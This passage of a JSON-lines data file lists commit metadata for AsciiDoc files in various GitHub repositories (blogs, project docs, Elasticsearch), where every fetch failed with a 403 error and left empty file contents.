'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba30a85fd75c97fdc973d3e8593901018ec457b8","subject":"1st version of REST_API.adoc","message":"1st version of REST_API.adoc\n","repos":"emender\/emender-jenkins,emender\/emender-jenkins","old_file":"doc\/REST_API.adoc","new_file":"doc\/REST_API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emender\/emender-jenkins.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"735695cd57b6d0a9860f7ad6b53aebb5cfdf257c","subject":"add reclojure","message":"add reclojure\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/reclojure.adoc","new_file":"content\/events\/2019\/reclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2906c7058a9e3e1ce3ddf0108e015e30d6c5cce6","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"882e1c266b4d26575322ef67ff25ac04d1efa834","subject":"Update 2015-07-13-Code-of-Conduct.adoc","message":"Update 2015-07-13-Code-of-Conduct.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2015-07-13-Code-of-Conduct.adoc","new_file":"_posts\/2015-07-13-Code-of-Conduct.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30305cc16ac22baff3252c047913880de35ea2db","subject":"Update 2016-03-28-T-I-M-E-W-A-I-T.adoc","message":"Update 2016-03-28-T-I-M-E-W-A-I-T.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-28-T-I-M-E-W-A-I-T.adoc","new_file":"_posts\/2016-03-28-T-I-M-E-W-A-I-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74be87e37cccbb189e26978542a06785f065d28d","subject":"Add README","message":"Add README\n","repos":"aslakknutsen\/arquillian-script-javascript,aslakknutsen\/arquillian-script-javascript","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aslakknutsen\/arquillian-script-javascript.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5c00e58f4d6ffaf24c5ccce1b8bde1f215340ab","subject":"Update 2015-11-18-Projeto.adoc","message":"Update 2015-11-18-Projeto.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-18-Projeto.adoc","new_file":"_posts\/2015-11-18-Projeto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0dcf8e19f5d0928352cb37b0dd28d1a7e10b931","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80417255e0e580a5c3c4e0fa74d0c04943df2eef","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7014b6f15fa6c4a2dcb14c3c063f5547371f7140","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"673a728bdc2491d7022e2e7d4dbb7c9881745d26","subject":"Add a simple TODO list for now","message":"Add a simple TODO list for now\n","repos":"ciarand\/operating-systems-memory-management-assignment","old_file":"TODO.adoc","new_file":"TODO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/operating-systems-memory-management-assignment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b891ac0990d2a3e13e2d01cdd1dd5faacba128ec","subject":"Updated readme; changing from \"author\" to \"creator\".","message":"Updated readme; changing from \"author\" to \"creator\".\n","repos":"brechin\/hypatia,brechin\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Applemann\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c54e126c3fd954ec2ea43fa63498dac6842492cf","subject":"fix version matrix for 3.1","message":"fix version matrix for 3.1\n","repos":"inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f316bd4b4a87dfea2764addd474bf8b386e0266","subject":"Bumping versions","message":"Bumping versions","repos":"ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshiste\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c45d49c176c2b598b0886b7d0fea2fed609a3e14","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Microsoft Office keys.asciidoc","new_file":"documentation\/Microsoft Office keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16a38b6cd1dfbbe7ca6c1a585309f5670af5f3b0","subject":"Update 2015-09-18-Royal-Caribbean-Dreamship.adoc","message":"Update 2015-09-18-Royal-Caribbean-Dreamship.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-18-Royal-Caribbean-Dreamship.adoc","new_file":"_posts\/2015-09-18-Royal-Caribbean-Dreamship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95f52f5fe435b63b90b264e78c2b4d22e662508d","subject":"Update 2016-03-18-Comment-ca-marche-Bitcoin.adoc","message":"Update 2016-03-18-Comment-ca-marche-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Comment-ca-marche-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Comment-ca-marche-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac45d42ffd82d2fe0400342edc87383de201176","subject":"y2b create post Air Conditioning Anywhere?","message":"y2b create post Air Conditioning Anywhere?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-27-Air-Conditioning-Anywhere.adoc","new_file":"_posts\/2016-08-27-Air-Conditioning-Anywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a4865dcc1ee862a60e86da983566395e98428b","subject":"add doc\/NOTES","message":"add doc\/NOTES\n","repos":"iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java","old_file":"jni-c\/doc\/NOTES.adoc","new_file":"jni-c\/doc\/NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iotk\/iochibity-java.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2985e807b1bc3fa17cd0198c89c96cfeb7b525cb","subject":"Update 2016-02-02-.adoc","message":"Update 2016-02-02-.adoc","repos":"blackgun\/blackgun.github.io,blackgun\/blackgun.github.io,blackgun\/blackgun.github.io","old_file":"_posts\/2016-02-02-.adoc","new_file":"_posts\/2016-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackgun\/blackgun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b89cac889d476cf9c7f2e9fb9a1b0388a5a69fab","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a4b9b6e8a1f2c94e0bca9ee0b589ceada72b07a","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2aa476b8f8d8ab7dbec8bf75314775102be55c6","subject":"Update 2016-07-15-Mi-primer-blog.adoc","message":"Update 2016-07-15-Mi-primer-blog.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-15-Mi-primer-blog.adoc","new_file":"_posts\/2016-07-15-Mi-primer-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0f9f7e351c9cf696ef7c49f0b34e8b44874b533","subject":"Update 2017-04-10-Cahilce-Sevmek.adoc","message":"Update 2017-04-10-Cahilce-Sevmek.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-04-10-Cahilce-Sevmek.adoc","new_file":"_posts\/2017-04-10-Cahilce-Sevmek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1e2411d8ba60ddc1f4d01d79a1340bd5d026f80","subject":"Update 2017-09-23-Promises-Await.adoc","message":"Update 2017-09-23-Promises-Await.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-23-Promises-Await.adoc","new_file":"_posts\/2017-09-23-Promises-Await.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1357bf3f6a39b7bf8d53175e982075b4a013be","subject":"y2b create post New 3DS Games! Ghost Recon \\u0026 Steeldiver Unboxing","message":"y2b create post New 3DS Games! Ghost Recon \\u0026 Steeldiver Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-28-New-3DS-Games-Ghost-Recon-u0026-Steeldiver-Unboxing.adoc","new_file":"_posts\/2011-03-28-New-3DS-Games-Ghost-Recon-u0026-Steeldiver-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3eb6f3ecf3a3a99431b98beebf3e5eaa66f19ba4","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b9b8b6191f901c845dfd2853e9cd67d6507eb8","subject":"Update 2016-04-05-Setting-title.adoc","message":"Update 2016-04-05-Setting-title.adoc","repos":"mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io","old_file":"_posts\/2016-04-05-Setting-title.adoc","new_file":"_posts\/2016-04-05-Setting-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrcouthy\/mrcouthy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5cf40c7060d6eeafddfce01c7c9f005e6556574","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ada32c2ac3982265856a014b111e74635936e5dd","subject":"Improved README","message":"Improved README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e281287bbdcc39bd22fa72e8b865dd2489bbad04","subject":"Update 2017-06-27-Episode-105-Touch-my-Glow-Balls.adoc","message":"Update 2017-06-27-Episode-105-Touch-my-Glow-Balls.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-27-Episode-105-Touch-my-Glow-Balls.adoc","new_file":"_posts\/2017-06-27-Episode-105-Touch-my-Glow-Balls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"666c8b95029d09f9313b5ed5b7d25051cd0d8b37","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b4f7fc26c20813322f776eb1f7ec0863185875","subject":"Update 2017-04-05-uno-id-uea.adoc","message":"Update 2017-04-05-uno-id-uea.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-uno-id-uea.adoc","new_file":"_posts\/2017-04-05-uno-id-uea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceab1710a9c24aafa08e743afac512a8b75b550b","subject":"Performance measure doc shell to get the communication started","message":"Performance measure doc shell to get the communication started\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/performance-measure.adoc","new_file":"docs\/src\/main\/asciidoc\/performance-measure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de7954c7722ab6bc4f42d44eeca1eb5895014ea","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aac66a79d6e2e63073b67c2d9eb8015ea0d37982","subject":"Delete the file at '_posts\/2017-07-07-Lazy-programmers.adoc'","message":"Delete the file at '_posts\/2017-07-07-Lazy-programmers.adoc'","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_file":"_posts\/2017-07-07-Lazy-programmers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5dd10ec110e563d39067aa1f499ed55dee60fd3","subject":"Hope will fix in future","message":"Hope will fix in future","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"docs\/USAGE.adoc","new_file":"docs\/USAGE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1601a74b76a9ed803d94d99165c2d7d35eebbbee","subject":"Release Notes (#244)","message":"Release Notes (#244)\n\n* Release Notes\r\n\r\n* Add JavaScript examples\r\n\r\n* Come from the approach of no type hints\r\n\r\nAnd other copyedits\r\n\r\n* Avoid hint; inferrence is what is going on\r\n\r\nand other c\/e\r\n\r\n* Improve type inference explanation\r\n\r\n* c\/e\r\n\r\n* Add Graal.JS to news\r\n\r\n* Add note thanking Clojurists Together and backers\r\n\r\n* Add Closure upgrade\r\n\r\n* Notes about Graal.JS perf and beta aspect\r\n\r\n* copyedits\r\n\r\n* Add paragraph regarding compiler perf.\r\n\r\n* Add paragraph on spec\r\n\r\n* Contributors, tools.analyzer, add a Change List section\r\n\r\n* Typo\r\n\r\n* Update with new :npm-deps default\r\n\r\n* Add Eric\r\n\r\n* Add Ray, fix Erik\u2019s name\r\n\r\n* Update :npm-deps for true value\r\n\r\n* Add Eugene\r\n\r\n* Add Jordan\u2019s name\r\n\r\n* Move to today\u2019s date\r\n\r\n* Updates\r\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-11-02-release.adoc","new_file":"content\/news\/2018-11-02-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6b6a3e03eb80c3a4a67253d728a793da7bf578f9","subject":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-09-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b9b9d7983c4fc6bc5a33ec75cec22e048528ff6","subject":"Revert \"Removed redundant docs\/community-clients\/index.asciidoc\"","message":"Revert \"Removed redundant docs\/community-clients\/index.asciidoc\"\n\nThese docs weren't redundant after all.\n\nThis reverts commit 22d163692cbb6857d352cd91a1b5c49ac2318fbc.\n","repos":"LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,avikurapati\/elasticsearch,henakamaMSFT\/elasticsearch,clintongormley\/elasticsearch,qwerty4030\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wuranbo\/elasticsearch,mortonsykes\/elasticsearch,zkidkid\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,kaneshin\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,awislowski\/elasticsearch,gingerwizard\/elasticsearch,nomoa\/elasticsearch,dongjoon-hyun\/elasticsearch,kaneshin\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,andrejserafim\/elasticsearch,clintongormley\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,obourgain\/elasticsearch,zkidkid\/elasticsearch,cwurm\/elasticsearch,maddin2016\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,shreejay\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,wbowling\/elasticsearch,snikch\/elasticsearch,gfyoung\/elasticsearch,jpountz\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,markharwood\/elasticsearch,trangvh\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,avikurapati\/elasticsearch,mmaracic\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,F0lha\/elasticsearch,Helen-Zhao\/elasticsearch,JervyShi\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra5-rc,ivansun1010\/elasticsearch,alexshadow007\/elasticsearch,ricardocerq\/elasticsearch,clintongormley\/elasticsearch,ESamir\/elasticsearch,vroyer\/elassandra,yynil\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,tebriel\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,jbertouch\/elasticsearch,wbowling\/elasticsearch,liweinan0423\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,dongjoon-hyun\/elasticsearch,davidvgalbraith\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,rmuir\/elasticsearch,sreeramjayan\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra5-rc,episerver\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,AndreKR\/elasticsearch,dpursehouse\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,davidvgalbraith\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,myelin\/elasticsearch,IanvsPoplicola\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,jbertouch\/elasticsearch,mmaracic\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,rmuir\/elasticsearch,uschindler\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,dongjoon-hyun\/elasticsearch,polyfractal\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,fernandozhu\/elasticsearch,martinstuga\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,a2lin\/elasticsearch,wbowling\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nezirus\/elasticsearch,AndreKR\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,tebriel\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,palecur\/elasticsearch,martinstuga\/elasticsearch,AndreKR\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,myelin\/elasticsearch,andrejserafim\/elasticsearch,trangvh\/elasticsearch,umeshdangat\/elasticsearch,gmarz\/elasticsearch,ivansun1010\/elasticsearch,mmaracic\/elasticsearch,rhoml\/elasticsearch,andrejserafim\/elasticsearch,robin13\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch